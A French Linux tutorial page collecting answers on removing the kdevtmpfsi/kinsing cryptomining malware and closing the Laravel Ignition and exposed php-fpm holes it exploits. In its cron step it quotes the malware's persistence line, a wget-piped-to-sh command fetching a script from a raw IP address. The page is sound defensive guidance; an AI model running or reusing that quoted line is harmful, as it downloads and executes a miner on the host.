GNU/Linux >> Tutoriels Linux >  >> Linux

kdevtmpfsi utilisant tout le CPU

La solution mentionnée ici a fonctionné pour nous. Vous créez essentiellement les fichiers que le mineur utilise, sans aucun droit, de sorte que le mineur ne peut pas les créer et les utiliser.https://github.com/docker-library/redis/issues/217

touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing

echo "everything is good here" > /tmp/kdevtmpfsi

echo "everything is good here" > /var/tmp/kinsing

touch /tmp/zzz

echo "everything is good here" > /tmp/zzz

chmod go-rwx /var/tmp

chmod 1777 /tmp

J'ai eu le même problème avec Laravel dans Centos 8, voici les étapes que j'ai suivies pour supprimer le logiciel malveillant et corriger le système.

Suppression du logiciel malveillant des étapes du système :Étape 1 :

Supprimez le logiciel malveillant :
Tuez les deux processus (kdevtmpfsi et kinsing -Ils peuvent avoir le même nom mais avec des caractères aléatoires à la fin-) en utilisant htop ou tout autre gestionnaire de processus.

htop F3 pour rechercher des services kdevtmpfsi et kinsing

Utilisez ce qui suit pour rechercher et supprimer les fichiers :

# find / -iname kdevtmpfsi* -exec rm -fv {} \;
# find / -iname kinsing* -exec rm -fv {} \;

La sortie devrait ressembler à :

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

Étape 2 :

Rechercher une tâche cron :
vérifiez s'il existe une tâche cron qui aurait réinitialisé le logiciel malveillant.
J'ai trouvé le mien dans :/var/spool/cron/apache>

UBUNTU /var/spool/cron/crontabs/www-data

Il comprenait les éléments suivants :
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

Étape 3 :

Créez de nouveaux fichiers et mettez-les en lecture seule : 

# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing

Correctif du projet Laravel :Étape 1 :

Désactivez APP_DEBUG :
assurez-vous que le APP_DEBUG l'attribut est false en .env car c'est ainsi que la vulnérabilité obtient l'accès.

Étape 2 :

Mettre à jour l'allumage :
Mettre à jour l'allumage vers une version supérieure à 2.5.1 pour vous assurer que la vulnérabilité est corrigée.
exécutez ce qui suit dans votre dossier de projet :

$ composer update facade/ignition

J'ai lutté avec ce mineur pendant quelques jours et dans mon cas c'était le php-fpm:9000 port exposé.
Je suppose qu'il est possible d'injecter du code à distance de cette façon.

Donc, si vous utilisez docker avec php-fpm , NE PAS exécuter votre conteneur de cette façon :

docker run -v /www:/var/www -p 9000:9000 php:7.4

Supprimez le mappage de port :-p 9000:9000 .

N'oubliez pas de reconstruire et de redémarrer vos conteneurs.

Plus de détails ici :https://github.com/laradock/laradock/issues/2451#issuecomment-577722571


Linux

  1. Dépannage à l'aide du système de fichiers proc sous Linux

  2. Utilisation de la force sur la ligne de commande Linux

  3. Utiliser –exclude avec la commande Du ?

  4. Obtenir des cycles de processeur à l'aide de RDTSC - pourquoi la valeur de RDTSC augmente-t-elle toujours ?

  5. Exécuter une application Qt sur le Web

Comment afficher les informations sur le processeur Linux à l'aide de CPUFetch

Voici comment regarder Netflix sur Linux avec Firefox

Une manière simple de comprendre la commande IOStat

Tutoriel sur l'utilisation de la commande Timeout sous Linux

Utilisation du sceau de confiance SiteLock

Utilisation des didacticiels vidéo cPanel